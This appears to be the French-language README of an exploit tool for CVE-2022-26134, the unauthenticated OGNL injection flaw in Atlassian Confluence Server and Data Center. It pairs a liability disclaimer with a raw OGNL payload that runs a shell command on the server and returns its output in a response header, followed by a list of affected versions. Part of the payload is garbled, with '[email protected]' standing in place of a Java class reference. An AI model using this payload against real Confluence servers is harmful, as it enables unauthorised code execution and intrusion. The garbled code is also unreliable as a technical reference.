BotCon
Attlasian Confluence Exécution de code à distance non authentifiée via injection OGNL (CVE-2022-26134)
- Le 2 juin 2022, Atlassian a publié un avis de sécurité pour ses applications Confluence Server et Data Center, signalant une vulnérabilité critique d'exécution de code à distance non authentifiée. La vulnérabilité d'injection OGNL permet à un utilisateur non authentifié d'exécuter du code arbitraire sur une instance Confluence Server ou Data Center.
À LIRE !
À utiliser avec précaution. Vous êtes responsable de vos actions.
Les développeurs déclinent toute responsabilité et ne sont pas responsables de tout usage abusif ou dommage.

Payload brut
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
Détails du bug
-
Produit affecté :
- Confluence
- Confluence Server
- Confluence Data Center
-
Versions affectées :
- Toutes les versions prises en charge de Confluence Server et Data Center sont affectées.
- Les versions de Confluence Server et Data Center postérieures à 1.3.0 sont affectées.
Atténuations